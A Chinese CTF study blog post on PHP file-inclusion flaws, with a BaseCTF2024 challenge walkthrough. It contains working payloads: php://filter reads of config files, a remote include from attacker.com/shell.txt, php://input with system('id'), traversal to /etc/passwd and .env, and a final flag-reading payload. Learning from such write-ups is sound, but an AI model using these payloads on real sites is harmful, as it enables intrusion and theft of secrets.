
  <!DOCTYPE html>
  <html lang="en"  >
  <head>
  <meta charset="utf-8">
  

  

  

  
  <script>window.icon_font = '4552607_tq6stt6tcg';window.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":50,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};</script>
  
  
  <title>
    文件包含 |
    
    Flight-star&#39;blog
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_tq6stt6tcg.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  
    <meta name="description" content="怎么检验存在文件包含：看看是否存在这些函数 这些函数会将目标文件内容作为PHP代码执行，是最高危的漏洞入口： 1.执行文件函数(1) include() 风险：包含并执行指定文件，文件不存在时仅警告。  示例漏洞代码： 12$file &#x3D; $_GET[&#x27;file&#x27;];include($file); &#x2F;&#x2F; 用户可控参数直接传递  利用方式： 12http:&#x2F;&#x2F;target.com">
<meta property="og:type" content="article">
<meta property="og:title" content="文件包含">
<meta property="og:url" content="http://example.com/2025/03/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/index.html">
<meta property="og:site_name" content="Flight-star&#39;blog">
<meta property="og:description" content="怎么检验存在文件包含：看看是否存在这些函数 这些函数会将目标文件内容作为PHP代码执行，是最高危的漏洞入口： 1.执行文件函数(1) include() 风险：包含并执行指定文件，文件不存在时仅警告。  示例漏洞代码： 12$file &#x3D; $_GET[&#x27;file&#x27;];include($file); &#x2F;&#x2F; 用户可控参数直接传递  利用方式： 12http:&#x2F;&#x2F;target.com">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/image-20250328001356207-1743092037331-1.png">
<meta property="og:image" content="http://example.com/images/image-20250328001640895-1743092202066-3.png">
<meta property="og:image" content="http://example.com/images/a32eefce2f8aed5db5aa74de0dc8dd14-1743154933528-5.png">
<meta property="og:image" content="http://example.com/images/image-20250328174332180-1743155013647-7.png">
<meta property="article:published_time" content="2025-03-24T12:17:19.000Z">
<meta property="article:modified_time" content="2025-04-07T01:52:25.338Z">
<meta property="article:author" content="Flight-star">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/image-20250328001356207-1743092037331-1.png">
  
  
    <link rel="alternate" href="/atom.xml" title="Flight-star'blog" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
  
  
  
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js"></script>

  
  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.0.1/dist/aos.css">

  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body>
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
          <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="#ff5252" />
          <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
         M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="#ff5252" />
        </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/">Home</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/archives">Archives</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/about">About</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/friend">Friend</a>
      </span>
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed" target="_blank"></a>
    
    
    
  </nav>
</div>
<header id="header">
  
    
      <img fetchpriority="high" src="/images/banner.webp" alt="文件包含">
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">文件包含</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content">
          
          <section id="main"><article id="post-文件包含" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <a href="/2025/03/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" class="article-date-link" data-aos="zoom-in">
    <time datetime="2025-03-24T12:17:19.000Z" itemprop="datePublished">2025-03-24</time>
    <time style="display: none;" id="post-update-time">2025-04-07</time>
  </a>
</div>

      

    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <h1 id="怎么检验存在文件包含："><a href="#怎么检验存在文件包含：" class="headerlink" title="怎么检验存在文件包含："></a>怎么检验存在文件包含：</h1><p>看看是否存在这些函数</p>
<p>这些函数会将目标文件内容作为PHP代码执行，是最高危的漏洞入口：</p>
<h3 id="1-执行文件函数"><a href="#1-执行文件函数" class="headerlink" title="1.执行文件函数"></a>1.执行文件函数</h3><h4 id="1-include"><a href="#1-include" class="headerlink" title="(1) include()"></a>(1) <code>include()</code></h4><ul>
<li><p><strong>风险</strong>：包含并执行指定文件，文件不存在时仅警告。</p>
</li>
<li><p><strong>示例漏洞代码</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$file = $_GET[&#x27;file&#x27;];</span><br><span class="line">include($file); // 用户可控参数直接传递</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>利用方式</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://target.com/?file=php://filter/convert.base64-encode/resource=config.php</span><br><span class="line">http://target.com/?file=http://attacker.com/shell.txt</span><br></pre></td></tr></table></figure></li>
</ul>
<h4 id="2-include-once"><a href="#2-include-once" class="headerlink" title="(2) include_once()"></a>(2) <code>include_once()</code></h4><ul>
<li><strong>行为</strong>：与<code>include()</code>相同，但确保文件只被包含一次。</li>
<li><strong>漏洞利用</strong>：同<code>include()</code>。</li>
</ul>
<h4 id="3-require"><a href="#3-require" class="headerlink" title="(3) require()"></a>(3) <code>require()</code></h4><ul>
<li><p><strong>风险</strong>：与<code>include()</code>类似，但文件不存在时会引发致命错误。</p>
</li>
<li><p><strong>示例漏洞代码</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">require($_POST[&#x27;module&#x27;] . &#x27;.php&#x27;);</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>利用方式</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST数据：module=php://input</span><br><span class="line">Body内容：&lt;?php system(&quot;id&quot;); ?&gt;</span><br></pre></td></tr></table></figure></li>
</ul>
<h4 id="4-require-once"><a href="#4-require-once" class="headerlink" title="(4) require_once()"></a>(4) <code>require_once()</code></h4><ul>
<li><strong>行为</strong>：与<code>require()</code>相同，但确保文件只被包含一次。</li>
<li><strong>漏洞利用</strong>：同<code>require()</code>。</li>
</ul>
<hr>
<h3 id="2-读取文件内容的函数（可能导致敏感信息泄露）"><a href="#2-读取文件内容的函数（可能导致敏感信息泄露）" class="headerlink" title="2. 读取文件内容的函数（可能导致敏感信息泄露）"></a><strong>2. 读取文件内容的函数（可能导致敏感信息泄露）</strong></h3><p>这些函数会读取文件内容但不会直接执行代码，若返回内容被输出到页面，可引发敏感信息泄露：</p>
<h4 id="1-file-get-contents"><a href="#1-file-get-contents" class="headerlink" title="(1) file_get_contents()"></a>(1) <code>file_get_contents()</code></h4><ul>
<li><p><strong>风险</strong>：读取文件内容并返回字符串。</p>
</li>
<li><p><strong>示例漏洞代码</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$config = file_get_contents($_GET[&#x27;path&#x27;]);</span><br><span class="line">echo $config;</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>利用方式</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://target.com/?path=/etc/passwd</span><br><span class="line">http://target.com/?path=php://filter/convert.base64-encode/resource=index.php</span><br></pre></td></tr></table></figure></li>
</ul>
<h4 id="2-file"><a href="#2-file" class="headerlink" title="(2) file()"></a>(2) <code>file()</code></h4><ul>
<li><strong>行为</strong>：将文件内容读取到数组中。</li>
<li><strong>漏洞利用</strong>：同<code>file_get_contents()</code>。</li>
</ul>
<h4 id="3-readfile"><a href="#3-readfile" class="headerlink" title="(3) readfile()"></a>(3) <code>readfile()</code></h4><ul>
<li><p><strong>风险</strong>：直接输出文件内容到输出缓冲区。</p>
</li>
<li><p><strong>示例漏洞代码</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$file = $_GET[&#x27;file&#x27;];</span><br><span class="line">readfile($file); // 直接输出文件内容</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>利用方式</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://target.com/?file=../../.env</span><br></pre></td></tr></table></figure></li>
</ul>
<h4 id="4-highlight-file-show-source"><a href="#4-highlight-file-show-source" class="headerlink" title="(4) highlight_file() &#x2F; show_source()"></a>(4) <code>highlight_file()</code> &#x2F; <code>show_source()</code></h4><ul>
<li><p><strong>行为</strong>：语法高亮显示PHP文件源码。</p>
</li>
<li><p><strong>漏洞利用</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://target.com/?file=flag.php</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="流程：（以catctf的catcat-new为例子）"><a href="#流程：（以catctf的catcat-new为例子）" class="headerlink" title="流程：（以catctf的catcat-new为例子）"></a>流程：（以<code>catctf</code>的<code>catcat-new</code>为例子）</h2><h3 id="1-查看是否存在读取文件的行为："><a href="#1-查看是否存在读取文件的行为：" class="headerlink" title="1.查看是否存在读取文件的行为："></a>1.查看是否存在读取文件的行为：</h3><p><img src="/../images/image-20250328001356207-1743092037331-1.png" alt="image-20250328001356207"></p>
<h3 id="2-尝试读取-etc-passwd"><a href="#2-尝试读取-etc-passwd" class="headerlink" title="2.尝试读取/etc/passwd"></a>2.尝试读取<code>/etc/passwd</code></h3><h4 id="要学会使用-………………来慢慢的找出是否可以读取-etc-passwd"><a href="#要学会使用-………………来慢慢的找出是否可以读取-etc-passwd" class="headerlink" title="要学会使用..&#x2F;..&#x2F;..&#x2F;………………来慢慢的找出是否可以读取/etc/passwd"></a>要学会使用..&#x2F;..&#x2F;..&#x2F;………………来慢慢的找出是否可以读取<code>/etc/passwd</code></h4><p><img src="/../images/image-20250328001640895-1743092202066-3.png" alt="image-20250328001640895"></p>
<h3 id="3-知晓要读取什么："><a href="#3-知晓要读取什么：" class="headerlink" title="3.知晓要读取什么："></a>3.知晓要读取什么：</h3><p><img src="/../images/a32eefce2f8aed5db5aa74de0dc8dd14-1743154933528-5.png" alt="img"></p>
<p><code>eg</code>：</p>
<p><img src="/../images/image-20250328174332180-1743155013647-7.png" alt="image-20250328174332180"></p>
<h3 id="4-知晓网站是由什么编写的："><a href="#4-知晓网站是由什么编写的：" class="headerlink" title="4.知晓网站是由什么编写的："></a>4.知晓网站是由什么编写的：</h3><p>使用工具<font color="red"><strong>Wappalyzer</strong></font></p>
<p>如果是py看看能不能SSTI</p>
<h1 id="例题："><a href="#例题：" class="headerlink" title="例题："></a>例题：</h1><h2 id="1-BaseCTF2024新生赛Aura酱的礼物"><a href="#1-BaseCTF2024新生赛Aura酱的礼物" class="headerlink" title="1.BaseCTF2024新生赛Aura酱的礼物"></a>1.BaseCTF2024新生赛Aura酱的礼物</h2><h3 id="考察什么？"><a href="#考察什么？" class="headerlink" title="考察什么？"></a>考察什么？</h3><p><font color="red">ping绕过，伪协议的利用，@绕过</font></p>
<h4 id="源码："><a href="#源码：" class="headerlink" title="源码："></a>源码：</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="comment">// Aura 酱，欢迎回家~</span></span><br><span class="line"><span class="comment">// 这里有一份礼物，请你签收一下哟~</span></span><br><span class="line"><span class="variable">$pen</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;pen&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$pen</span>)!== <span class="string">&#x27;Aura&#x27;</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;这是 Aura 的礼物，你不是 Aura！&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 礼物收到啦，接下来要去博客里面写下感想哦~</span></span><br><span class="line"><span class="variable">$challenge</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;challenge&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">strpos</span>(<span class="variable">$challenge</span>, <span class="string">&#x27;http://jasmineaura.github.io&#x27;</span>)!== <span class="number">0</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;这不是 Aura 的博客！&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$blog_content</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$challenge</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">strpos</span>(<span class="variable">$blog_content</span>, <span class="string">&#x27;已经收到Kengwang的礼物啦&#x27;</span>) === <span class="literal">false</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;请去博客里面写下感想哦&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 嘿嘿，接下来要拆开礼物啦，悄悄告诉你，礼物在 flag.php 里面哦~</span></span><br><span class="line"><span class="variable">$gift</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;gift&#x27;</span>];</span><br><span class="line"><span class="keyword">include</span>(<span class="variable">$gift</span>); </span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">// 以语法高亮的形式输出当前PHP文件的源代码，通常用于调试或展示代码结构</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">// Aura 酱，欢迎回家~</span><br><span class="line">// 这里有一份礼物，请你签收一下哟~</span><br><span class="line">// 从HTTP POST请求中获取名为 &#x27;pen&#x27; 的参数值，并将其赋值给变量 $pen</span><br><span class="line">$pen = $_POST[&#x27;pen&#x27;];</span><br><span class="line"></span><br><span class="line">// 尝试读取 $pen 所指定文件的内容</span><br><span class="line">// 若该文件内容不等于 &#x27;Aura&#x27;，则终止脚本执行，并输出错误信息</span><br><span class="line">if (file_get_contents($pen)!== &#x27;Aura&#x27;)</span><br><span class="line">&#123;</span><br><span class="line">    die(&#x27;这是 Aura 的礼物，你不是 Aura！&#x27;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// 礼物收到啦，接下来要去博客里面写下感想哦~</span><br><span class="line">// 从HTTP POST请求中获取名为 &#x27;challenge&#x27; 的参数值，并将其赋值给变量 $challenge</span><br><span class="line">$challenge = $_POST[&#x27;challenge&#x27;];</span><br><span class="line"></span><br><span class="line">// 查找 &#x27;http://jasmineaura.github.io&#x27; 在 $challenge 字符串中首次出现的位置</span><br><span class="line">// 若该位置不是字符串的起始位置（即不等于 0），则终止脚本执行，并输出错误信息</span><br><span class="line">if (strpos($challenge, &#x27;http://jasmineaura.github.io&#x27;)!== 0)</span><br><span class="line">&#123;</span><br><span class="line">    die(&#x27;这不是 Aura 的博客！&#x27;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// 尝试读取 $challenge 所指定URL的内容，并将其赋值给变量 $blog_content</span><br><span class="line">$blog_content = file_get_contents($challenge);</span><br><span class="line"></span><br><span class="line">// 查找 &#x27;已经收到Kengwang的礼物啦&#x27; 在 $blog_content 中首次出现的位置</span><br><span class="line">// 若未找到（返回 false），则终止脚本执行，并输出错误信息</span><br><span class="line">if (strpos($blog_content, &#x27;已经收到Kengwang的礼物啦&#x27;) === false)</span><br><span class="line">&#123;</span><br><span class="line">    die(&#x27;请去博客里面写下感想哦&#x27;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// 嘿嘿，接下来要拆开礼物啦，悄悄告诉你，礼物在 flag.php 里面哦~</span><br><span class="line">// 从HTTP POST请求中获取名为 &#x27;gift&#x27; 的参数值，并将其赋值给变量 $gift</span><br><span class="line">$gift = $_POST[&#x27;gift&#x27;];</span><br><span class="line"></span><br><span class="line">// 包含并执行 $gift 所指定的文件，一般期望该文件为 flag.php，以获取礼物内容</span><br><span class="line">include($gift); </span><br></pre></td></tr></table></figure>



<h4 id="1-伪协议利用："><a href="#1-伪协议利用：" class="headerlink" title="1.伪协议利用："></a>1.伪协议利用：</h4><p>以后看见文件读取一定要记得伪协议！！！！！</p>
<p><strong>使用伪协议输入Aura</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pen=data:<span class="comment">//text/plain,Aura</span></span><br></pre></td></tr></table></figure>



<h4 id="2-绕过"><a href="#2-绕过" class="headerlink" title="2.@绕过"></a>2.@绕过</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">代码错误地检查了 PHP_URL_USER（用户信息部分）而非 PHP_URL_HOST（主机名）、</span><br><span class="line">scheme:<span class="comment">//[user:password@]host[:port][/path][?query][#fragment]</span></span><br></pre></td></tr></table></figure>

<p>这里**@把前面的代码当作了user了**</p>
<h4 id="最终payload："><a href="#最终payload：" class="headerlink" title="最终payload："></a>最终payload：</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pen=data:<span class="comment">//text/plain,Aura&amp;challenge=http://jasmineaura.github.io@127.0.0.1&amp;gift=php://filter/read=convert.base64-encode/resource=flag.php</span></span><br></pre></td></tr></table></figure>



<h2 id="2-XYctf签到："><a href="#2-XYctf签到：" class="headerlink" title="2.XYctf签到："></a>2.XYctf签到：</h2>
      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
      

    </footer>
  </div>
  
    
  <nav id="article-nav" data-aos="fade-up">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="/covers/ruime and sakuya.jpg" data-sizes="auto" alt="NCTF" class="lazyload">
          
        
        <a href="/2025/03/25/NCTF/"></a>
        <div class="article-nav-caption">Newer</div>
        <h3 class="article-nav-title">
          
            NCTF
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="https://github.com/Flight-star-cy/my-images/blob/main/ruime%20and%20sakuya.jpg" data-sizes="auto" alt="攻防世界-misc" class="lazyload">
        
      
      <a href="/2025/03/23/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-misc/"></a>
      <div class="article-nav-caption">Older</div>
      <h3 class="article-nav-title">
        
          攻防世界-misc
        
      </h3>
    </div>
    
  </nav>


  
</article>






</section>
          
            <aside id="sidebar">
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">Contents</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%8E%E4%B9%88%E6%A3%80%E9%AA%8C%E5%AD%98%E5%9C%A8%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">怎么检验存在文件包含：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.1.</span> <span class="toc-text">1.执行文件函数</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-include"><span class="toc-number">1.0.1.1.</span> <span class="toc-text">(1) include()</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-include-once"><span class="toc-number">1.0.1.2.</span> <span class="toc-text">(2) include_once()</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-require"><span class="toc-number">1.0.1.3.</span> <span class="toc-text">(3) require()</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-require-once"><span class="toc-number">1.0.1.4.</span> <span class="toc-text">(4) require_once()</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9%E7%9A%84%E5%87%BD%E6%95%B0%EF%BC%88%E5%8F%AF%E8%83%BD%E5%AF%BC%E8%87%B4%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%EF%BC%89"><span class="toc-number">1.0.2.</span> <span class="toc-text">2. 读取文件内容的函数（可能导致敏感信息泄露）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-file-get-contents"><span class="toc-number">1.0.2.1.</span> <span class="toc-text">(1) file_get_contents()</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-file"><span class="toc-number">1.0.2.2.</span> <span class="toc-text">(2) file()</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-readfile"><span class="toc-number">1.0.2.3.</span> <span class="toc-text">(3) readfile()</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-highlight-file-show-source"><span class="toc-number">1.0.2.4.</span> <span class="toc-text">(4) highlight_file() &#x2F; show_source()</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%81%E7%A8%8B%EF%BC%9A%EF%BC%88%E4%BB%A5catctf%E7%9A%84catcat-new%E4%B8%BA%E4%BE%8B%E5%AD%90%EF%BC%89"><span class="toc-number">1.1.</span> <span class="toc-text">流程：（以catctf的catcat-new为例子）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E6%9F%A5%E7%9C%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E8%A1%8C%E4%B8%BA%EF%BC%9A"><span class="toc-number">1.1.1.</span> <span class="toc-text">1.查看是否存在读取文件的行为：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%B0%9D%E8%AF%95%E8%AF%BB%E5%8F%96-etc-passwd"><span class="toc-number">1.1.2.</span> <span class="toc-text">2.尝试读取&#x2F;etc&#x2F;passwd</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A6%81%E5%AD%A6%E4%BC%9A%E4%BD%BF%E7%94%A8-%E2%80%A6%E2%80%A6%E2%80%A6%E2%80%A6%E2%80%A6%E2%80%A6%E6%9D%A5%E6%85%A2%E6%85%A2%E7%9A%84%E6%89%BE%E5%87%BA%E6%98%AF%E5%90%A6%E5%8F%AF%E4%BB%A5%E8%AF%BB%E5%8F%96-etc-passwd"><span class="toc-number">1.1.2.1.</span> <span class="toc-text">要学会使用..&#x2F;..&#x2F;..&#x2F;………………来慢慢的找出是否可以读取&#x2F;etc&#x2F;passwd</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E7%9F%A5%E6%99%93%E8%A6%81%E8%AF%BB%E5%8F%96%E4%BB%80%E4%B9%88%EF%BC%9A"><span class="toc-number">1.1.3.</span> <span class="toc-text">3.知晓要读取什么：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E7%9F%A5%E6%99%93%E7%BD%91%E7%AB%99%E6%98%AF%E7%94%B1%E4%BB%80%E4%B9%88%E7%BC%96%E5%86%99%E7%9A%84%EF%BC%9A"><span class="toc-number">1.1.4.</span> <span class="toc-text">4.知晓网站是由什么编写的：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">例题：</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-BaseCTF2024%E6%96%B0%E7%94%9F%E8%B5%9BAura%E9%85%B1%E7%9A%84%E7%A4%BC%E7%89%A9"><span class="toc-number">2.1.</span> <span class="toc-text">1.BaseCTF2024新生赛Aura酱的礼物</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%80%83%E5%AF%9F%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">2.1.1.</span> <span class="toc-text">考察什么？</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BA%90%E7%A0%81%EF%BC%9A"><span class="toc-number">2.1.1.1.</span> <span 